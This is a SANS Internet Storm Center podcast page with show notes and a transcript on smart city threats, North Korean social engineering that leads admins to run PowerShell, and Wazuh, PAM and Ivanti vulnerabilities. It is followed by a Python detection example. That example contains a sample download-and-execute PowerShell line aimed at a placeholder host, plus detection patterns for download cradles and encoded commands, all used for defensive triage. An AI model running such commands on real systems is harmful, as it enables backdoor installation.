SANS Stormcast Feb 13th 2025: Smart City Threats; Advanced Social Engineering Attacks; Wazuh Vulnerability; PAM Vulnerability; Ivanti Patches

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9322.mp3


An Ontology for Threats: Cybercrime and Digital Forensic Investigation on Smart City Infrastructure
Smart cities are a big topic for many local governments. As these complex systems get built, attacks will follow.
https://isc.sans.edu/diary/An%20ontology%20for%20threats%2C%20cybercrime%20and%20digital%20forensic%20investigation%20on%20Smart%20City%20Infrastructure/31676

North Korean state actor tricking admins into executing PowerShell
North Korean state actors are spending quite a bit of effort setting up relationships with South Korean system administrators, culminating in them getting tricked into executing malicious PowerShell scripts.
https://x.com/MsftSecIntel/status/1889407814604296490

Wazuh Vulnerability
A deserialization vulnerability in the Wazuh server API may allow unauthenticated remote code execution.
https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh

PAM PKCS11 Vulnerability
Several vulnerabilities in the Linux PAM module that processes smart card authentication can be used to bypass authentication.
https://github.com/OpenSC/pam_pkcs11/releases/tag/pam_pkcs11-0.6.13

Ivanti Patches
Ivanti released its monthly update, fixing a number of critical vulnerabilities in Connect Secure and other products.
https://forums.ivanti.com/s/article/February-Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-and-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs?language=en_US
Podcast Transcript

Hello and welcome to the Thursday, February 13th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and I'm recording from Jacksonville, Florida. Well, today we got a diary from Yee Ching and Yee Ching is writing actually about a scientific paper that he and his colleagues are about to publish that deals with smart city infrastructure. Smart cities, of course, a big deal. Yee Ching is from Singapore, which has heavily signed up to implement smart city technologies. And it's kind of nice to see that people are already thinking about how to defend smart city technologies and how to securely implement them. And it's a little bit sort of what Yee Ching's post is about. They look in particular at SCOPE. SCOPE is an ontology in order to describe smart city threats. Now, just for those of you who don't know, ontologies are essentially used to define a standardized vocabulary when you're dealing with a subject matter. You can, for example, see like the MITRE ATT&CK framework and such as an ontology. SCOPE is specifically targeting smart cities. Sadly, well, what Yee Ching found, it's not quite as applicable as they hoped yet for smart city threats. And for more details, well, I'll refer to Yee Ching's diary.

And Microsoft observed an interesting technique being used by North Korean attackers against victims in South Korea, in particular targeting more sophisticated users. A lot of the times we're talking about phishing and attacks like this in social engineering. Training often focuses more on non-technical users because they're often of the more likely target here. But of course, more sophisticated users, system administrators and the like are a much more valuable target. So attackers are spending more time and effort actually getting through to these targets. That apparently is what's happening here where the attacker is first establishing a relationship with the victim in the form of emails claiming to be associated with the South Korean government in this particular case. And it all then accumulates in the attacker sending instructions in the form of a PDF how to solve a particular problem under a system. But these instructions then essentially result in actually running a PowerShell command that will install a backdoor. So this is a very dangerous attack if successful, because now you have an authorized administrator in your network running a PowerShell command, which may not necessarily trigger an alert. When you're alerting on PowerShell, you often look for users that don't execute PowerShell as part of their day-to-day work. But of course, an administrator like this may routinely run PowerShell commands to change configurations and the like on systems. So this is easily going to slip under the radar. Be aware of these attacks and definitely something if you are doing more specific training for these types of users, something to include in the training. Given that this is now a public technique, I wouldn't be too surprised if you wouldn't see this even like from organized crime and the like being used in order to infiltrate networks.

And we also have a few vulnerabilities to talk about. The first one is remote code execution vulnerability in Wazuh server. Wazuh is a log monitoring, endpoint protection system. It's an open source system, but it does offer an API. And this API apparently suffers from one of those ubiquitous deserialization vulnerabilities, which then led to this vulnerability. There is no authentication required. Anybody who is able to access the API, which hopefully is only allowed to be accessed from inside your network, could potentially exploit this vulnerability.

Then we have several vulnerabilities in the PAM module for smart card authentication in Linux. The vulnerabilities essentially result in authentication bypass, which of course is a critical vulnerability. Also, CVSS scores here in the high nines for these vulnerabilities. Some of these vulnerabilities may be rather trivial to exploit. It's a little bit surprising. It took so long to have them found. For example, if there's an error condition, the error condition is ignored and you're automatically logged in. Also, some of the constraints for certificates and such are not observed correctly. Definitely something that you need to address quickly. And I would think by now you will find some updates just via your normal Linux distributions update channels.

But then back to the friends of the show, as I call them, for all the content they're providing. Ivanti has released their February update. In particular, a number of critical vulnerabilities are being addressed in Ivanti Connect Secure, but also other Ivanti products are affected.

And well, that's it for today. Just a quick note about yesterday's podcast. I mentioned the iOS, iPadOS patches. Well, there was also a macOS update, but it did not address any security patches. There was a question that came up from a couple of listeners. That's it for today. Thanks for listening and talk to you again tomorrow. Bye.
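The detection point raised in the transcript about the North Korean social engineering campaign is that a rule keyed on "which users run PowerShell" goes quiet when the victim is an administrator who runs PowerShell every day. The following is an added example, not code from SANS ISC, Microsoft or the podcast, of triaging process-creation events by what was run and what launched it instead of by who ran it. The four events, the user names, paths and the `CORP` domain are constructed; the field names follow Sysmon Event ID 1 naming as an assumption. Since an admin following PDF instructions may type the command into a console by hand, the parent-process check is only one signal; the command-line content checks carry the weight.

```python
"""Added example (not SANS ISC / Microsoft code): triage PowerShell launches by
command-line content and parent process rather than by user identity.
All events below are constructed; Sysmon EID 1 field names are an assumption."""
import base64
import re

# Benign payload, encoded the way -EncodedCommand expects (base64 of UTF-16LE),
# so the sample event looks realistic but is harmless.
ENCODED_BENIGN = base64.b64encode("Write-Output 'hi'".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed sample records
    {"id": 1, "User": r"CORP\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"id": 2, "User": r"CORP\adm-kim", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\ops\rotate-logs.ps1"},
    {"id": 3, "User": r"CORP\adm-kim",
     "ParentImage": r"C:\Program Files\Adobe\Acrobat Reader\AcroRd32.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                    f"-WindowStyle Hidden -EncodedCommand {ENCODED_BENIGN}"},
    {"id": 4, "User": r"CORP\adm-kim", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -Command \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/fix.ps1')\""},
]

# Identity baseline (assumed): accounts expected to run PowerShell day to day.
BASELINE_POWERSHELL_USERS = {r"CORP\adm-kim"}

# Parents that should not normally be spawning PowerShell at all.
DOCUMENT_PARENTS = ("acrord32.exe", "winword.exe", "excel.exe", "outlook.exe",
                    "chrome.exe", "msedge.exe")

# PowerShell accepts abbreviated switch names, so match the common prefixes.
ENCODED_RE = re.compile(r"(?i)\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")
CONTENT_PATTERNS = [
    ("encoded command", ENCODED_RE),
    ("hidden window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("execution policy bypass", re.compile(r"(?i)-e(?:p|x\w*)\s+bypass")),
    ("download cradle", re.compile(
        r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|\biex\b")),
]


def identity_rule(event):
    """The baseline approach the transcript describes: flag PowerShell run by
    anyone not expected to run it. Silent for the administrator in this scenario."""
    return event["User"] not in BASELINE_POWERSHELL_USERS


def content_rule(event):
    """Reasons derived from what was run and what launched it, independent of user."""
    reasons = []
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if parent in DOCUMENT_PARENTS:
        reasons.append("launched from document reader or browser")
    for name, pattern in CONTENT_PATTERNS:
        if pattern.search(event["CommandLine"]):
            reasons.append(name)
    return reasons


def decode_encoded_command(cmdline):
    """Recover the plaintext of an -EncodedCommand argument for the analyst,
    or None when the command line carries no (valid) encoded payload."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Map event id -> verdict from both rules plus the decoded payload, if any."""
    return {e["id"]: {"identity": identity_rule(e),
                      "content": content_rule(e),
                      "decoded": decode_encoded_command(e["CommandLine"])}
            for e in events}


if __name__ == "__main__":
    for event_id, verdict in triage(SAMPLE_EVENTS).items():
        print(event_id, verdict)
```

Events 3 and 4 are the admin's launches: the identity rule passes both, while the content rule flags the encoded, hidden, policy-bypassing launch from a PDF reader and the download-and-execute one-liner typed into a console. Event 1 shows the flip side: the identity rule fires on a non-admin running a harmless `Get-Service`, which is the noise that tempts teams to tune identity-based rules down.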